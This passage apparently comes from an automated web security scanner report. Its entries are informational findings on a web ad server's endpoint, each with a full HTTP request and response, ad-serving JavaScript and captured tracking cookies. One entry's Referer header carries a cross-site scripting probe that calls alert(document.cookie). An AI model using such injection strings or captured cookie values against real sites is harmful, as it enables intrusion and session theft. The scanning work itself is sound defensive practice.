//<![CDATA[
function getRADIds() { return{"adid":"83000000000032738","pid":"8085302","targetid":"8295071"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003I/83000000000032738.1??PID=8085302&amp;UIT=G&amp;TargetID=8295071&amp;AN=19546691&amp;PG=INV4QB&amp;ASID=6fc58236a441404a87225f1f24011955" target="_blank"><img src="http://ads2.msads.net/CIS/79/000/000/000/011/364.gif" width="120" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.262. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; FC07=FB=; FC08=FB=; s_cc=true; FC09=FB=; FC03=FB=AgEAVQ6ZuagB; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 18:08:32 GMT

<!--NOAD--><img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C01&R="/>

22.263. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN1&AP=1390 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; s_cc=true; s_sq=%5B%5BB%5D%5D; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2415
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P5960713-T37386627-C21000000000018636
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:30:57 GMT
Content-Length: 2415


//<![CDATA[
function getRADIds() { return{"adid":"21000000000018636","pid":"5960713","targetid":"37386627"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1898056222() {var adCode_1898056222=new Array();adCode_1898056222.push('<iframe src="http://view.atdmt.com/APM/iview/148848786/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1898056222.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1898056222.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/148848786/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/148848786/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

22.264. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCSAT&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2761
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC08=FB=AgEAYQ4mwwwU; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8261482-T37486885-C73000000000032314
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:49:25 GMT
Content-Length: 2761


//<![CDATA[
function getRADIds() { return{"adid":"73000000000032314","pid":"8261482","targetid":"37486885"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1781205665() {var adCode_1781205665=new Array();adCode_1781205665.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&amp;&amp;PID=8261482&amp;UIT=G&amp;TargetID=37486885&amp;AN=1781205665&amp;PG=NBCSAT&amp;ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1781205665.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/
...[SNIP]...

22.265. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 758
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7417783-T8352780-C26000000000155956
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 758


//<![CDATA[
function getRADIds() { return{"adid":"26000000000155956","pid":"7417783","targetid":"8352780"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/26000000000155956.1??PID=7417783&amp;UIT=G&amp;TargetID=8352780&amp;AN=1361119510&amp;PG=MSNREC&amp;ASID=de331aa337944a769f55f1004dce6d4b" target="_blank"><img src="http://ads2.msads.net/CIS/119/000/000/000/012/553.jpg" width="300" height="250" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.266. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 404
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P3782944-T8338642-C521263
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:33 GMT
Content-Length: 404


//<![CDATA[
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
document.write('<a href="http://g.redacted/0AD00004/521263.1??PID=3782944&amp;UIT=G&amp;TargetID=8338642&amp;AN=2030584453&amp;PG=MSNSUR" ><img src="http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif" width="1" height="1" alt="Click&#32;Here&#33;" border="0" /></a>
...[SNIP]...

22.267. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2401
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P4529257-T37386205-C77000000000005928
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:24:17 GMT
Content-Length: 2401


//<![CDATA[
function getRADIds() { return{"adid":"77000000000005928","pid":"4529257","targetid":"37386205"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_135413821() {var adCode_135413821=new Array();adCode_135413821.push('<iframe src="http://view.atdmt.com/APM/iview/139941180/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_135413821.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_135413821.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/139941180/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/139941180/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

22.268. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 961
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C4000000000033190
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 961


//<![CDATA[
function getRADIds() { return{"adid":"4000000000033190","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003S/4000000000033190.1??PID=8009935&amp;UIT=G&amp;TargetID=22841720&amp;AN=1209024888&amp;PG=MSNHQ2&amp;ASID=b376e427ee3847729d56e06610cc38a4" target="_blank"><img src="http://ads2.msads.net/CIS/79/000/000/000/008/787.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.269. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=AgEAVQ5AiKgB; Sample=63; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; FC07=FB=; FC08=FB=; FC09=FB=; FC03=FB=; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=AD04D6F8B2FF44629973BD0674351135; mh=MSFT; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:57:12 GMT

<!--NOAD--><img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C43&R="/>

22.270. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 962
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C56000000000036466
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:46:33 GMT
Content-Length: 962


//<![CDATA[
function getRADIds() { return{"adid":"56000000000036466","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.redacted/2AD0003S/56000000000036466.1??PID=8009935&amp;UIT=G&amp;TargetID=22841720&amp;AN=956498424&amp;PG=MSNHQ2&amp;ASID=3d9b0f7f91734e77a00f20c624746190" target="_blank"><img src="http://ads2.msads.net/CIS/65/000/000/000/008/748.gif" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1358.829.tk.100x25/956498424" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

22.271. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C3000000000032324
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:23 GMT
Content-Length: 751


//<![CDATA[
function getRADIds() { return{"adid":"3000000000032324","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
try
...[SNIP]...
<a href="http://g.redacted/2AD0003L/3000000000032324.1??PID=8031597&amp;UIT=G&amp;TargetID=8247108&amp;AN=1477462768&amp;PG=INV4QA&amp;ASID=24148a130c2d473cb5958654d4f1ed12" target="_blank"><img src="http://ads2.msads.net/CIS/52/000/000/000/010/255.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.272. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013958-T8395935-C18000000000034994
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 15:12:04 GMT
Content-Length: 2751


//<![CDATA[
function getRADIds() { return{"adid":"18000000000034994","pid":"8013958","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1181757() {var adCode_1181757=new Array();adCode_1181757.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&amp;&amp;PID=8013958&amp;UIT=G&amp;TargetID=8395935&amp;AN=1181757&amp;PG=INVHP1&amp;ASID=4cd985aabf2445519529dc22f0228baa&destination=;ord=1181757?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1181757.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.5;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:/
...[SNIP]...

22.273. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2399
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8008908-T8395935-C26000000000153628
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:59:52 GMT
Content-Length: 2399


//<![CDATA[
